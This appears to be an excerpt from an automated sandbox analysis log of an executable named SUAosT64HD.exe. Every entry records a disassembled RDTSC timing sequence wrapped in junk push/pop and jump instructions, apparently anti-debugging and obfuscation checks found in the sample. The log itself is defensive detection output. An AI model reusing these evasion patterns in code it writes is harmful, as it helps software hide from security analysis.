Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702E98 second address: 702EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702EA0 second address: 702EA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702EA4 second address: 702EA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702EA8 second address: 702ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC350C3E716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FC350C3E71Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC350C3E71Eh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702ED3 second address: 702ED9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702A45 second address: 702A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702A49 second address: 702A4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702A4F second address: 702A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7060E6 second address: 70610A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC3507E5376h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC3507E5381h 0x00000012 jnc 00007FC3507E5376h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 70B6EF second address: 70B6FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC350C3E71Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7FAA second address: 6B7FC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 70BF4B second address: 70BF4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 70BF4F second address: 70BF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 70BF55 second address: 70BF82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E725h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FC350C3E72Ah 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007FC350C3E716h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 70C0EE second address: 70C11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC3507E5376h 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FC3507E5382h 0x00000015 jnc 00007FC3507E5376h 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 70E3B1 second address: 70E3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 712083 second address: 712087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 712087 second address: 71209A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007FC350C3E716h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 71209A second address: 7120C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC3507E5376h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FC3507E5387h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7120C2 second address: 7120C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 719FF9 second address: 71A029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5380h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FC3507E5387h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 71A029 second address: 71A031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 718323 second address: 718336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FC3507E5378h 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 718336 second address: 71835B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC350C3E716h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FC350C3E71Ah 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FC350C3E71Bh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 719728 second address: 71974A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC3507E5376h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FC3507E5384h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 71974A second address: 719760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jnp 00007FC350C3E716h 0x0000000e jnc 00007FC350C3E716h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 719CF5 second address: 719D1D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jbe 00007FC3507E5376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC3507E5389h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 723C07 second address: 723C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 723194 second address: 723198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 723198 second address: 7231A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7231A6 second address: 7231AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7231AD second address: 7231CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jne 00007FC350C3E716h 0x00000009 jmp 00007FC350C3E721h 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 723324 second address: 72333F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC3507E5376h 0x0000000a pop edx 0x0000000b jmp 00007FC3507E5380h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72333F second address: 72335A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E727h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72335A second address: 72335E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72BFA4 second address: 72BFAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72BFAB second address: 72BFBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FC3507E537Eh 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72A619 second address: 72A62C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC350C3E71Eh 0x00000008 jno 00007FC350C3E716h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72A62C second address: 72A638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC3507E5376h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72A79E second address: 72A7AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FC350C3E716h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72A7AD second address: 72A7CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC3507E5387h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72A8FE second address: 72A953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC350C3E729h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jp 00007FC350C3E716h 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FC350C3E71Fh 0x0000001a popad 0x0000001b popad 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC350C3E722h 0x00000024 jl 00007FC350C3E716h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72A953 second address: 72A95D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC3507E5376h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72AA85 second address: 72AAD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 js 00007FC350C3E71Eh 0x0000000b push esi 0x0000000c pop esi 0x0000000d js 00007FC350C3E716h 0x00000013 jnp 00007FC350C3E718h 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c pushad 0x0000001d jmp 00007FC350C3E722h 0x00000022 push edx 0x00000023 jnp 00007FC350C3E716h 0x00000029 pop edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FC350C3E728h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72ADA1 second address: 72ADC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC3507E5382h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007FC3507E537Ah 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72AF30 second address: 72AF48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push esi 0x00000008 jmp 00007FC350C3E71Dh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72B68B second address: 72B6B2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC3507E537Fh 0x0000000e je 00007FC3507E5376h 0x00000014 pushad 0x00000015 popad 0x00000016 je 00007FC3507E5376h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72B6B2 second address: 72B6BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 72B6BA second address: 72B6BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7338A7 second address: 7338AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7338AB second address: 7338BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FC3507E5376h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7338BD second address: 7338C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7338C1 second address: 7338D7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jng 00007FC3507E5376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d jc 00007FC3507E53B9h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7338D7 second address: 733907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC350C3E729h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC350C3E720h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 733A76 second address: 733A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 733A7A second address: 733A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 733C09 second address: 733C22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5383h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 73FBFE second address: 73FC04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 73FC04 second address: 73FC22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 je 00007FC3507E5376h 0x0000000c jmp 00007FC3507E5381h 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 74F605 second address: 74F613 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 74F613 second address: 74F617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 74F617 second address: 74F61B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 74F61B second address: 74F673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3507E5386h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c ja 00007FC3507E5376h 0x00000012 jp 00007FC3507E5376h 0x00000018 pop edx 0x00000019 jng 00007FC3507E5383h 0x0000001f jmp 00007FC3507E537Dh 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FC3507E5387h 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 74F673 second address: 74F679 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 67857A second address: 678581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 678581 second address: 67858A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 67858A second address: 67858E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 75701D second address: 75705C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E722h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC350C3E71Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC350C3E729h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 75B613 second address: 75B617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 75B617 second address: 75B638 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FC350C3E725h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 75B799 second address: 75B7A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC3507E5376h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 75BA6C second address: 75BA72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7605BB second address: 7605DB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC3507E5388h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7601C9 second address: 7601CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7601CF second address: 7601D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 76BFB1 second address: 76BFB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 76BFB7 second address: 76BFBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 76BFBB second address: 76BFC1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 76BFC1 second address: 76BFF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5385h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC3507E5386h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 76BFF7 second address: 76BFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 77E85B second address: 77E85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 77E85F second address: 77E863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 79A4D8 second address: 79A4FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3507E5383h 0x00000009 ja 00007FC3507E537Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 79A4FB second address: 79A500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7994E2 second address: 7994E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7997F1 second address: 7997F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7997F5 second address: 799818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC3507E5387h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 799818 second address: 79981C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 799974 second address: 79997C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 79997C second address: 799982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 799DC4 second address: 799DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 799DC8 second address: 799DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC350C3E721h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007FC350C3E728h 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 799DFB second address: 799E15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC3507E5385h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
